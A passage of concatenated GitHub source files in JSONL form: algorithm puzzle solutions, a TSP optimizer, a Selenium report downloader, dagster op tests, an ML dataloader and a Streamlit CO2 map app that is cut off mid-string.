CorporationMarket(\n\t\t\t\tcorporation=corporation_market.corporation,\n\t\t\t\tmarket=corporation_market.market,\n\t\t\t\tturn=game.current_turn + 1,\n\t\t\t\tvalue=corporation_market.value,\n\t\t\t\tbubble_value=corporation_market.bubble_value)\n\t\t\tnew_corporation_markets.append(new_corporation_market)\n\t\t# On next turn, these will be modified until they stand for the final values\n\t\tCorporationMarket.objects.bulk_create(new_corporation_markets)\n\ntasks = (UpdateBubblesAfterEffectsTask, UpdateBubblesAfterCrashTask, ReplicateCorporationMarketsTask, )\n\ninitialisation_tasks = (CreateBubblesAfterGameCreationTask, ReplicateCorporationMarketsTask, )\n","repo_name":"Neamar/corporate","sub_path":"engine_modules/market/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":8174,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"21749573951","text":"C, R = map(int, input().split())\nnum = int(input())\ndi = [0, 1, 0, -1]\ndj = [1, 0, -1, 0]\narr = [[0] * C for _ in range(R)]\n\nif num > C*R:\n print(0)\nelse:\n i, j, dr = 0, R, 0\n for cnt in range(1, C*R +1):\n arr[i][j] = cnt\n ni = i + di[dr]\n nj = j + dj[dr]\n if 0 <= ni < R and 0 <= nj < C and arr[ni][nj] == 0:\n i, j = ni, nj\n else:\n dr = (dr+1) % 4\n i = i+ di[dr]\n j = j+ dj[dr]\n\n arr = list(zip(arr[::-1]))\n arr2 = []\n for lst in arr:\n arr2.append(lst[0])\n\n for n in range(R):\n for m in range(C):\n if num == arr2[n][m]:\n a = R-n\n b = C-m\n\n print(a, b)\n","repo_name":"shinlama/TIL","sub_path":"Algorithms/boj_10157_seat.py","file_name":"boj_10157_seat.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8946984360","text":"import argparse\r\nimport random\r\nimport math\r\nfrom time import time\r\nimport geopy.distance\r\n\r\ndef load_cities(input_file):\r\n cities = {}\r\n city_list=[]\r\n with open(input_file, 'r') as f:\r\n for line in f:\r\n name, x, y = line.strip().split(',')\r\n cities[name] = (float(x), float(y))\r\n city_list.append(name)\r\n return cities\r\n \r\n\r\n# 
Calculate the Straight line distance between two cities\r\ndef distance(city1, city2):\r\n x1, y1 = city1\r\n x2, y2 = city2\r\n return geopy.distance.geodesic(city1, city2).km\r\ndef random_path(cities):\r\n tour = list(cities.keys())\r\n #tour=tour[0:16]\r\n random.shuffle(tour)\r\n return tour\r\n\r\n# Define the tour length function\r\ndef tour_length(tour,cities):\r\n length = 0\r\n for i in range(len(tour)-1):\r\n length += distance (cities[tour[i]],cities[tour[i+1]])\r\n return length\r\n# Swap two cities in a path\r\ndef swap(path, i, j):\r\n path[i], path[j] = path[j], path[i]\r\n\r\n# Perform the Hill Climbing algorithm \r\ndef hill_climb(cities):\r\n # Generate a random initial path\r\n current_path = random_path(cities)\r\n x=current_path\r\n # Calculate the distance of the current path\r\n current_distance = tour_length(current_path, cities)\r\n y= current_distance\r\n # Keep track of the best path and its distance\r\n best_path = current_path\r\n best_distance = current_distance\r\n # Perform iterations until no better neighbor is found\r\n while True:\r\n # Find the best neighbor\r\n for i in range(len(current_path)):\r\n for j in range(i+1, len(current_path)):\r\n # Swap two cities in the path\r\n swap(current_path, i, j)\r\n # Calculate the distance of the new path\r\n new_distance = tour_length(current_path, cities)\r\n # If the new path is better, remember it\r\n if new_distance < best_distance:\r\n best_path = current_path[:]\r\n best_distance = new_distance\r\n # Swap the cities back to their original positions\r\n swap(current_path, i, j)\r\n # If the best neighbor is not better than the current path, stop\r\n if best_distance == current_distance:\r\n break\r\n # Otherwise, move to the best neighbor and continue\r\n current_path = best_path\r\n current_distance = best_distance\r\n # Return the best path and its distance\r\n return x, y, best_path, best_distance\r\n\r\n\r\n\r\n# Define the acceptance probability function\r\ndef acceptance_probability(current_length, new_length, temperature):\r\n if new_length < current_length:\r\n return 1.0\r\n else:\r\n return math.exp((current_length - new_length) / temperature)\r\n# Define the Simulated Annealing algorithm\r\ndef simulated_annealing(cities, temperature, cooling_rate, stopping_temperature, stopping_iter):\r\n # Initialize the current and best tours\r\n current_tour = random_path(cities)\r\n best_tour = current_tour.copy()\r\n \r\n # Initialize the current and best tour lengths\r\n current_length = tour_length(current_tour,cities)\r\n best_length = current_length\r\n \r\n # Initialize the iteration counter\r\n iteration = 1\r\n \r\n # Loop until the stopping criteria are met\r\n while temperature > stopping_temperature and iteration < stopping_iter:\r\n # Choose two random cities to swap\r\n i, j = random.sample(range(len(current_tour)), 2)\r\n \r\n # Swap the cities to get a new tour\r\n new_tour = current_tour.copy()\r\n new_tour[i], new_tour[j] = new_tour[j], new_tour[i]\r\n # Calculate the length of the new tour\r\n new_length = tour_length(new_tour,cities)\r\n \r\n # Decide whether to accept the new tour\r\n if acceptance_probability(current_length, new_length, temperature) > random.random():\r\n current_tour = new_tour\r\n current_length = new_length\r\n \r\n # Update the best tour if necessary\r\n if current_length < best_length:\r\n best_tour = current_tour.copy()\r\n best_length = current_length\r\n \r\n # Update the temperature and iteration counter\r\n temperature *= cooling_rate\r\n iteration += 1\r\n 
\r\n return best_tour, best_length\r\n\r\n\r\n\r\n\r\n# Define the main function\r\ndef main():\r\n # Define the command-line arguments\r\n parser = argparse.ArgumentParser('choose one')\r\n \r\n parser.add_argument('--algorithm', choices=[ 'hc', 'sa'], required=True,\r\n help='Algorithm to use (hc: Hill Climbing, sa: Simulated Annealing)')\r\n parser.add_argument('--file', type=str, help='The input file containing the city list')\r\n # Parse the command-line arguments\r\n args = parser.parse_args()\r\n \r\n cities = load_cities(args.file)\r\n\r\n \r\n # Set the parameters for the Simulated Annealing algorithm\r\n temperature = 1000.0\r\n cooling_rate = 0.99\r\n stopping_temperature = 1e-8\r\n stopping_iter = 1000\r\n \r\n if args.algorithm == 'hc':\r\n current_path,current_distance,path, distance = hill_climb(cities)\r\n print('rando path:', ' -> '.join( current_path))\r\n print('rando path Distance:', current_distance)\r\n print('Best path:', ' -> '.join(path))\r\n print('Distance:', distance)\r\n elif args.algorithm == 'sa':\r\n best_tour, best_length = simulated_annealing(cities, temperature, cooling_rate, stopping_temperature, stopping_iter)\r\n print('Best Tour:', best_tour)\r\n print('Best Tour Length:', best_length)\r\n \r\n start=time()\r\n # Run the Simulated Annealing algorithm\r\n best_tour, best_length = simulated_annealing( cities, temperature, cooling_rate, stopping_temperature, stopping_iter)\r\n \r\n # Print the results\r\n print('Best Tour:', best_tour)\r\n print('Best Tour Length:', best_length)\r\n end=time()\r\n print(end-start, 'secs')\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"bezagetaneh/Localserach","sub_path":"TSP.py","file_name":"TSP.py","file_ext":"py","file_size_in_byte":5973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25437058229","text":"import re\nf = open('day4.txt', 'r')\n\nproperties = {'byr', 'iyr','eyr', 'hgt','hcl', 'ecl', 'pid'}\nvalid=0\n\ndict={}\n\nfor lines in f:\n if lines!='\\n':\n list = re.split(r'[: \\n]',lines) # creates an emtpy list item at the end because newline is a \\s character so delete\n # print(list) #problem in the last line with no return also not spliting the way I want\n if list[-1] =='':\n list.pop() #if newline, remove from list\n for e in range(0,len(list)-1,2):\n dict[list[e]] = list[e+1]\n # print(dict)\n else:\n if properties.issubset(dict.keys()):\n print('all correct')\n print(dict)\n valid+=1\n dict.clear() #reset dictionary\nif properties.issubset(dict.keys()):\n print('all correct')\n print(dict)\n valid+=1\n \nprint(valid)\n","repo_name":"01bbae/adventofcode2020","sub_path":"day4-1.py","file_name":"day4-1.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19236826116","text":"import datetime\nimport os\nimport time\n\nfrom bs4 import BeautifulSoup\nfrom openpyxl import load_workbook\nfrom selenium.webdriver.common.by import By\n\nfrom .agency_driver import AgencyDriver\n\n\ndef generate_default_report_name():\n # today = datetime.date.today() # TODO: uncomment when using for real\n today = datetime.date(2021, 12, 28) # TODO: comment when using for real\n first = today.replace(day=1)\n last_month = first - datetime.timedelta(days=1)\n last_month_number = last_month.strftime(\"%m\")\n last_year_number = last_month.strftime(\"%Y\")\n current_month_number = today.strftime(\"%m\")\n current_year_number = today.strftime(\"%Y\")\n return 
f'statystyki_oferty_26-{last_month_number}-{last_year_number}_25-{current_month_number}-{current_year_number}.xlsx'\n\n\ndef generate_stats_sheet_default_name():\n # today = datetime.date.today() # TODO: uncomment when using for real\n today = datetime.date(2021, 12, 27) # TODO: comment when using for real\n first = today.replace(day=1)\n last_month = first - datetime.timedelta(days=1)\n last_month_number = last_month.strftime(\"%m\")\n last_year_number = last_month.strftime(\"%Y\")\n current_month_number = today.strftime(\"%m\")\n current_year_number = today.strftime(\"%Y\")\n return f'Statystyk_{last_year_number}-{last_month_number}-26_{current_year_number}-{current_month_number}-25'\n\n\ndefault_report_name = generate_default_report_name()\nstats_sheet_default_name = generate_stats_sheet_default_name()\nreports_path = '/home/kajetan/Documents/pryzmat/reports/'\n\n\ndef click_to_generate_report(username, driver):\n print(f'generate report for account: {username}')\n driver.open_client_and_stats(username)\n driver.set_ads_type('sponsored')\n driver.set_date_range('last_billing_month')\n driver.set_detail_level('offers')\n driver.click((By.XPATH, '//*[@id=\"layoutBody\"]/div/div/div[3]/div[2]/button[3]'))\n\n\ndef generate_reports(accounts_list):\n print('function generate reports started')\n # if datetime.date.today().day < 26:\n # raise Exception(\"It is too early for generating reports for previous billing month\")\n driver = AgencyDriver()\n for account in accounts_list:\n click_to_generate_report(account, driver)\n print('function generate reports finished, reports are now generated')\n\n\ndef check_for_report(username, driver):\n print(f'check for report for account: {username}')\n driver.open_client(username)\n driver.open_my_files()\n time.sleep(1)\n soup = BeautifulSoup(driver.page_source, 'html5lib')\n tags = soup.findAll(string=default_report_name)\n for tag in tags:\n if tag.parent.name != 'strong':\n parent = tag.parent.parent\n status = parent.findAll('div')[3].text.strip('Status')\n return status == 'Gotowe'\n\n\ndef check_for_reports(accounts_list):\n print(f'function check for reports started')\n driver = AgencyDriver()\n ready = 0\n for account in accounts_list:\n if check_for_report(account, driver):\n ready += 1\n else:\n return False\n print(f'function check for reports finished')\n return ready == len(accounts_list)\n\n\ndef rename_and_format_file(username):\n file_path = reports_path + default_report_name\n wb = load_workbook(filename=file_path)\n stats_sheet_name = 'Statystyk_' + stats_sheet_default_name\n del wb[stats_sheet_name]\n ws = wb.active\n ws.delete_cols(1, 2)\n # TODO: sort data\n # TODO: add default columns width\n new_file_path = reports_path + f'raport-{username}.xlsx'\n wb.save(new_file_path)\n os.remove(file_path)\n\n\ndef download_report(username, driver):\n print(f'download report for account: {username}')\n driver.open_client(username)\n driver.open_my_files()\n time.sleep(1)\n driver.click((By.CSS_SELECTOR, 'button[title=\"Pobierz plik\"]'))\n time.sleep(2)\n rename_and_format_file(username)\n\n\ndef download_reports(accounts_list):\n print(f'function download reports started')\n driver = AgencyDriver()\n for account in accounts_list:\n download_report(account, driver)\n print(f'function download reports finished')\n\n\ndef run_reports_downloader(accounts_list):\n print(f'started reports downloader for {len(accounts_list)} accounts')\n generate_reports(accounts_list)\n sleep_time = 60 * 2\n reports_ready = False\n while not reports_ready:\n 
time.sleep(sleep_time)\n time_now = datetime.datetime.now().strftime(\"%H:%M:S\")\n print(f'{time_now}, next check if reports are ready in: {sleep_time / 60} minutes')\n reports_ready = check_for_reports(accounts_list)\n download_reports(accounts_list)\n\n","repo_name":"katek1094/allegroAds","sub_path":"src/agency_panel/reports_downloader.py","file_name":"reports_downloader.py","file_ext":"py","file_size_in_byte":4658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38896935949","text":"from phone_book import MyPhoneBook\n\n\ndef hello():\n while True:\n print(\"Welcome to Your Phone Book.\")\n printing_value = [\"1. Add Contact\", \"2. Modify Contact.\", \"3. Delete Contact \", \"4. See all Contacts\",\n \"5. Get Contact by Name.\", \"6. Sorted Contact\"]\n for ps in range(len(printing_value)):\n print(printing_value[ps])\n number = int(input(\"enter your choice \"))\n if number == 1:\n MyPhoneBook().add_contact()\n if number == 2:\n MyPhoneBook().modify_contact()\n if number == 3:\n MyPhoneBook().delete_contact()\n if number == 4:\n MyPhoneBook().get_all_contacts()\n if number == 5:\n MyPhoneBook().get_contact()\n if 0 > number < 6:\n print(\"Invalid number entered. Please try again: \")\n\n\ndef main():\n hello()\n\nif __name__ == \"__main__\":\n main()\n \n","repo_name":"heenabaheti/python-programs","sub_path":"phone_book/handeler.py","file_name":"handeler.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21454978645","text":"# -*- coding: utf-8 -*-\nclass Solution(object):\n def findAllCombo(self, nums):\n res = []\n nums.sort()\n for i in range(len(nums)-2):\n if i == 0 or nums[i-1] != nums[i]:\n l = i+1\n r = len(nums)-1\n while l < r:\n sum = nums[i]**2 + nums[l]**2\n if sum == nums[r]**2:\n res.append((nums[i],nums[l],nums[r]))\n break\n elif sum < nums[r]**2:\n l += 1\n else:\n r -= 1\n return res\n\nassert Solution().findAllCombo([6,7,8,10]) == [(6,8,10)]","repo_name":"jerrt2003/leetcode-in-python","sub_path":"Interview_Feedback/Google/15. 
3Sum/變形/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29635282090","text":"import argparse\nimport logging\nfrom pathlib import Path\n\nimport openeo\nfrom openeo.internal.graph_building import PGNode\nfrom openeo.rest.vectorcube import VectorCube\n\nfrom utils import read_geojson, read_udf\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)-8s %(message)s')\n\ndef get_script_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"-f\", \"--file\", required=True,\n help=\"GeoJSON based file that contains the input fields to process\")\n parser.add_argument(\"-b\", \"--batch\", action='store_true',\n help=\"Generate the results in batch mode\")\n parser.add_argument(\"-o\", \"--output\", default='../files/dem',\n help=\"File path where to store the results\")\n return parser.parse_args()\n\n\ndef setup_openeo():\n return openeo.connect(\"http://openeo.vito.be\").authenticate_oidc()\n\n\ndef create_bbox(connection, features: dict) -> VectorCube:\n return VectorCube(connection=connection,\n graph=PGNode(\n process_id='run_udf',\n arguments={\n 'runtime': 'Python',\n 'udf': read_udf('create_bbox.py'),\n 'data': features\n }\n ))\n\nif __name__ == '__main__':\n\n args = get_script_args()\n\n features = read_geojson(Path(args.file))\n connection = setup_openeo()\n features = create_bbox(connection, features)\n dc = connection.load_collection('SENTINEL2_L2A_SENTINELHUB',\n bands=[\"B03\", \"B04\", \"B08\", \"sunAzimuthAngles\", \"sunZenithAngles\", \"viewAzimuthMean\",\n \"viewZenithMean\", 'SCL']) \\\n .filter_temporal(['2023-01-01', '2023-01-10'])\n dc = dc.mask_polygon(features)\n\n\n if args.batch:\n dc_job = dc.send_job(out_format=\"GTiff\", title=f'Variability Map',\n sample_by_feature=False)\n dc_job.start_and_wait().get_results().download_files(args.output)\n else:\n output = Path(f'{args.output}/result.tiff')\n output.parent.mkdir(parents=True, exist_ok=True)\n dc.download(output, format='GTiff')\n\n\n\n","repo_name":"JanssenBrm/openeo-samples","sub_path":"services/dem.py","file_name":"dem.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25679623707","text":"import albumentations as A\nfrom albumentations.pytorch import ToTensorV2\nimport torch.utils.data as data\n\nfrom .datasets import ACDC\n\n\ndef _data_transforms_acdc():\n mean = [0.485, 0.456, 0.406]\n std = [0.229, 0.224, 0.225]\n train_transform = A.Compose(\n [\n A.Normalize(mean=mean, std=std),\n A.RandomCrop(512, 512, p=1.0),\n # A.ColorJitter(brightness=0.5, contrast=0.5, saturation=0.5),\n A.VerticalFlip(p=0.5),\n A.RandomRotate90(p=0.5),\n ToTensorV2(),\n ]\n )\n\n valid_transform = A.Compose(\n [A.Normalize(mean=mean, std=std), A.CenterCrop(512, 512, p=1.0), ToTensorV2(),]\n )\n\n return train_transform, valid_transform\n\n\ndef get_dataloader_acdc(\n root, train=True, batch_size=32, client_id=None, out_client=False\n):\n train_transform, valid_transform = _data_transforms_acdc()\n\n transform = train_transform if train else valid_transform\n dataset = ACDC(root, train, transform, client_id, out_client)\n dataloader = data.DataLoader(\n dataset, batch_size=batch_size, shuffle=True, num_workers=4\n )\n\n return 
dataloader\n","repo_name":"Lee-Gihun/FedSeg","sub_path":"train_tools/preprocessing/acdc/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74726756327","text":"from flask_restful import Resource\r\nfrom endpoints import IsEmirleri\r\nfrom bin import Optimizer\r\n\r\nclass Optimizasyon(Resource):\r\n def __init__(self, database):\r\n self.is_emirleri = IsEmirleri.IsEmirleri(database) \r\n self.optimizer = Optimizer.Optimizer(self.is_emirleri) \r\n \r\n def get(self, tezgah=None, meydanci=None, sehpa=None, is_bagi=None):\r\n self.optimizer.gercege_donustur(self.optimizer.optimize(tezgah, meydanci, sehpa, is_bagi))\r\n\r\n return self.is_emirleri.get()\r\n","repo_name":"berkaydedeoglu/ACYS_Rest_API","sub_path":"endpoints/Optimizasyon.py","file_name":"Optimizasyon.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36370006396","text":"from datetime import datetime\nfrom ...views.base_views import BaseView\nfrom ...pbb.tools import FixKantor\nfrom pyramid.view import view_config\nfrom pyramid.httpexceptions import (\n HTTPFound,\n HTTPForbidden,\n )\n\nclass PbbView(BaseView):\n def __init__(self, request):\n super(PbbView, self).__init__(request)\n self.kd_kantor = 'kd_kantor' in self.ses and self.ses['kd_kantor'] or '01'\n self.kd_kanwil = 'kd_kanwil' in self.ses and self.ses['kd_kanwil'] or '01'\n self.ses['kd_kantor'] = self.kd_kantor\n self.ses['kd_kanwil'] = self.kd_kanwil\n \n########\n# Home #\n########\nclass HomeView(PbbView):\n def __init__(self, request):\n super(HomeView, self).__init__(request)\n\n @view_config(route_name='F100000', renderer='templates/home.pt',\n permission='')\n def view_home(self):\n return dict(project='pbb')\n\n ","repo_name":"aagusti/opensipkd-pajak","sub_path":"pajak/pbb/views/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71888422569","text":"# 백준 2831 댄스파티\n\nn = int(input())\nm = list(map(int,input().split()))\nw = list(map(int,input().split()))\nm_pos = list()\nw_pos = list()\nm_neg = list()\nw_neg = list()\n\nfor i in range(n):\n if m[i] > 0:\n m_pos.append(m[i])\n else:\n m_neg.append(abs(m[i]))\n if w[i] > 0:\n w_pos.append(w[i])\n else:\n w_neg.append(abs(w[i]))\n\nanswer = 0\nm_pos.sort()\nm_neg.sort()\nw_pos.sort()\nw_neg.sort()\n\nl = 0\nr = 0\n\nwhile l < len(m_pos) and r < len(w_neg):\n if m_pos[l] < w_neg[r]:\n answer += 1\n l += 1\n r += 1\n else:\n r += 1\n\nl = 0\nr = 0\nwhile l < len(w_pos) and r < len(m_neg):\n if w_pos[l] < m_neg[r]:\n answer += 1\n l += 1\n r += 1\n else:\n r += 1\n\nprint(answer)\n\n","repo_name":"do0134/solostudy","sub_path":"algorithm/11월/1103/3sol.py","file_name":"3sol.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9890068727","text":"import sys\nfrom typing import Generator, Iterable, Iterator\n\nimport pytest\nfrom dagster import AssetKey, DynamicOut, DynamicOutput, In, Out, Output, op\nfrom dagster._core.errors import DagsterInvalidDefinitionError\nfrom dagster._legacy import InputDefinition, OutputDefinition\n\n\ndef test_flex_inputs():\n @op(ins={\"arg_b\": In(metadata={\"explicit\": True})})\n def partial(_context, arg_a, 
arg_b):\n return arg_a + arg_b\n\n assert partial.input_defs[0].name == \"arg_b\"\n assert partial.input_defs[0].metadata[\"explicit\"]\n assert partial.input_defs[1].name == \"arg_a\"\n\n\ndef test_merge_type():\n @op(ins={\"arg_b\": In(metadata={\"explicit\": True})})\n def merged(_context, arg_b: int):\n return arg_b\n\n assert (\n merged.input_defs[0].dagster_type == InputDefinition(\"test\", dagster_type=int).dagster_type\n )\n assert merged.input_defs[0].metadata[\"explicit\"]\n\n\ndef test_merge_desc():\n @op(ins={\"arg_b\": In(metadata={\"explicit\": True})})\n def merged(_context, arg_a, arg_b, arg_c):\n \"\"\"Testing.\n\n Args:\n arg_b: described\n \"\"\"\n return arg_a + arg_b + arg_c\n\n assert merged.input_defs[0].name == \"arg_b\"\n assert merged.input_defs[0].description == \"described\"\n assert merged.input_defs[0].metadata[\"explicit\"]\n\n\ndef test_merge_default_val():\n @op(ins={\"arg_b\": In(dagster_type=int, metadata={\"explicit\": True})})\n def merged(_context, arg_a: int, arg_b=3, arg_c=0):\n return arg_a + arg_b + arg_c\n\n assert merged.input_defs[0].name == \"arg_b\"\n assert merged.input_defs[0].default_value == 3\n assert (\n merged.input_defs[0].dagster_type == InputDefinition(\"test\", dagster_type=int).dagster_type\n )\n\n\ndef test_precedence():\n @op(\n ins={\n \"arg_b\": In(\n dagster_type=str,\n default_value=\"hi\",\n description=\"legit\",\n metadata={\"explicit\": True},\n input_manager_key=\"rudy\",\n asset_key=AssetKey(\"table_1\"),\n asset_partitions={\"0\"},\n )\n }\n )\n def precedence(_context, arg_a: int, arg_b: int, arg_c: int):\n \"\"\"Testing.\n\n Args:\n arg_b: boo\n \"\"\"\n return arg_a + arg_b + arg_c\n\n assert precedence.input_defs[0].name == \"arg_b\"\n assert (\n precedence.input_defs[0].dagster_type\n == InputDefinition(\"test\", dagster_type=str).dagster_type\n )\n assert precedence.input_defs[0].description == \"legit\"\n assert precedence.input_defs[0].default_value == \"hi\"\n assert precedence.input_defs[0].metadata[\"explicit\"]\n assert precedence.input_defs[0].input_manager_key == \"rudy\"\n assert precedence.input_defs[0].get_asset_key(None) is not None\n assert precedence.input_defs[0].get_asset_partitions(None) is not None\n\n\ndef test_output_merge():\n @op(out={\"four\": Out()})\n def foo(_) -> int:\n return 4\n\n assert foo.output_defs[0].name == \"four\"\n assert foo.output_defs[0].dagster_type == OutputDefinition(int).dagster_type\n\n\ndef test_iter_out():\n @op(out={\"A\": Out()})\n def _ok(_) -> Iterator[Output]:\n yield Output(\"a\", output_name=\"A\")\n\n @op\n def _also_ok(_) -> Iterator[Output]:\n yield Output(\"a\", output_name=\"A\")\n\n @op\n def _gen_too(_) -> Generator[Output, None, None]:\n yield Output(\"a\", output_name=\"A\")\n\n @op(out={\"A\": Out(), \"B\": Out()})\n def _multi_fine(_) -> Iterator[Output]:\n yield Output(\"a\", output_name=\"A\")\n yield Output(\"b\", output_name=\"B\")\n\n\ndef test_dynamic():\n @op(out=DynamicOut(dagster_type=int))\n def dyn_desc(_) -> Iterator[DynamicOutput]:\n \"\"\"\n Returns:\n numbers.\n \"\"\" # noqa: D212\n yield DynamicOutput(4, \"4\")\n\n assert dyn_desc.output_defs[0].description == \"numbers.\"\n assert dyn_desc.output_defs[0].is_dynamic\n\n\n@pytest.mark.skipif(\n sys.version_info < (3, 7),\n reason=(\n \"typing types isinstance of type in py3.6,\"\n \" https://github.com/dagster-io/dagster/issues/4077\"\n ),\n)\ndef test_not_type_input():\n with pytest.raises(\n DagsterInvalidDefinitionError,\n match=(\n r\"Problem using type '.*' from type 
annotation for argument 'arg_b', correct the issue\"\n r\" or explicitly set the dagster_type\"\n ),\n ):\n\n @op\n def _create(\n _context,\n # invalid since Iterator is not a python type or DagsterType\n arg_b: Iterator[int],\n ):\n return arg_b\n\n with pytest.raises(\n DagsterInvalidDefinitionError,\n match=(\n r\"Problem using type '.*' from type annotation for argument 'arg_b', correct the issue\"\n r\" or explicitly set the dagster_type\"\n ),\n ):\n\n @op(ins={\"arg_b\": In()})\n def _combine(\n _context,\n # invalid since Iterator is not a python type or DagsterType\n arg_b: Iterator[int],\n ):\n return arg_b\n\n with pytest.raises(\n DagsterInvalidDefinitionError,\n match=(\n r\"Problem using type '.*' from return type annotation, correct the issue or explicitly\"\n r\" set the dagster_type\"\n ),\n ):\n\n @op\n def _out(_context) -> Iterable[int]:\n return [1]\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster_tests/definitions_tests/test_op_io.py","file_name":"test_op_io.py","file_ext":"py","file_size_in_byte":5337,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"31939224004","text":"import view, model, pygame, sys, constants\nfrom model import MoveType\n\nclass GameController:\n def __init__(self, SCREEN):\n self.board = model.GameBoard()\n self.SCREEN = SCREEN\n self.VIEW = view.GameView(SCREEN, self.board.getPieces())\n self.VIEW.drawBoard()\n self.board.addObserver(self.VIEW)\n\n def tryMove(self, event):\n mouseX, mouseY = event.pos\n x = mouseX // constants.TILE_SIZE\n y = mouseY // constants.TILE_SIZE\n move = self.VIEW.selectedPiece.piece.canMove(x, y, self.board)\n if move != MoveType.INVALID:\n if move == MoveType.PROMOTION:\n self.VIEW.flipBars()\n self.board.movePiece(x, y, self.VIEW.selectedPiece.piece, move)\n self.VIEW.selectedPiece = None\n\n\n else:\n self.VIEW.abortMove()\n\n def handle(self, event):\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n self.VIEW.selectPiece(event)\n self.VIEW.currentbar.tryButtons(event)\n elif event.type == pygame.MOUSEBUTTONUP and self.VIEW.selectedPiece:\n self.tryMove(event)\n elif event.type == pygame.MOUSEMOTION:\n self.VIEW.dragPiece(event)\n\n\n\n\n\n\n","repo_name":"finnstew/chess","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5465968299","text":"#updated on 6 June 2021\nimport chart_desciption\nimport plotly.express as px\nimport streamlit as st\nimport pandas as pd\n\nimport altair as alt\nfrom plotly import graph_objs as go\n\n# set page layout\nst.set_page_config(\n page_title=\"COMPX532A - Final Project Andrew CHOI\",\n page_icon=\"🌍\",\n initial_sidebar_state=\"expanded\"\n)\n\n\n@st.cache\ndef load_data():\n dataframe = pd.read_csv('https://raw.githubusercontent.com/owid/co2-data/master/owid-co2-data.csv')\n return dataframe\n\n\n# clean the datasets\n@st.cache\ndef trim_datasets(dataframe):\n # trim the dataframe\n df = dataframe.drop(columns=['co2_growth_prct', 'co2_growth_abs', 'consumption_co2',\n 'consumption_co2_per_capita', 'share_global_co2', 'share_global_cumulative_co2',\n 'co2_per_gdp', 'consumption_co2_per_gdp', 'co2_per_unit_energy',\n 'cement_co2_per_capita',\n 'coal_co2_per_capita', 'flaring_co2_per_capita', 'gas_co2_per_capita',\n 'oil_co2_per_capita',\n 'other_co2_per_capita', 
'share_global_coal_co2', 'share_global_oil_co2',\n 'share_global_gas_co2',\n 'share_global_flaring_co2', 'share_global_cement_co2',\n 'share_global_cumulative_coal_co2',\n 'share_global_cumulative_oil_co2', 'share_global_cumulative_gas_co2',\n 'share_global_cumulative_flaring_co2',\n 'share_global_cumulative_cement_co2', 'total_ghg', 'ghg_per_capita', 'methane',\n 'methane_per_capita', 'nitrous_oxide',\n 'nitrous_oxide_per_capita', 'primary_energy_consumption', 'energy_per_capita',\n 'energy_per_gdp'])\n # df = df[['iso_code','country','year','co2','co2_per_capita',\n # 'trade_co2','cement_co2','coal_co2','flaring_co2',\n # 'gas_co2','oil_co2','other_industry_co2','cumulative_co2',\n # 'cumulative_coal_co2','cumulative_oil_co2','cumulative_gas_co2',\n # 'cumulative_flaring_co2','cumulative_cement_co2','population','gdp']]\n return df\n\n\ndef get_df_year_mx_mi(dataframe):\n min_year = int(dataframe['year'].min())\n max_year = int(dataframe['year'].max())\n return min_year, max_year\n\n\n# checkbox to show all data\ndef check_box_show(df):\n check_box_sd = st.checkbox('Show All Data')\n if check_box_sd:\n st.dataframe(df)\n return\n\n\n# set up the data frame for choropleth map\ndef control_dataframe(dataframe):\n df = dataframe.loc[dataframe['year'] == select_year]\n df['population'] = df['population'].map('{:,}'.format) # format the integer with comma\n df['gdp'] = df['gdp'].map('{:,}'.format) # format the integer with comma\n df['population'] = df['population'].astype(str) # change the data type to string for concatenation\n df['gdp'] = df['gdp'].astype(str) # change the data type to string for concatenation\n df['text'] = df['country'] + '
Population: ' + df['population'] + '
GDP: ' + df['gdp']\n df_columns_list = df.columns.tolist()\n df_columns_list.remove('iso_code')\n df_columns_list.remove('country')\n df_columns_list.remove('year')\n df_columns_list.remove('population')\n df_columns_list.remove('gdp')\n return df, df_columns_list\n\n\n@st.cache\ndef get_co2_choropleth_map(dataframe, year, select_sector):\n fig_choropleth = go.Figure(data=go.Choropleth(\n locations=dataframe['iso_code'],\n z=dataframe[select_sector],\n text=dataframe['text'],\n colorscale='agsunset',\n autocolorscale=False,\n reversescale=True,\n marker_line_color='darkgray',\n marker_line_width=1,\n colorbar_title='CO2
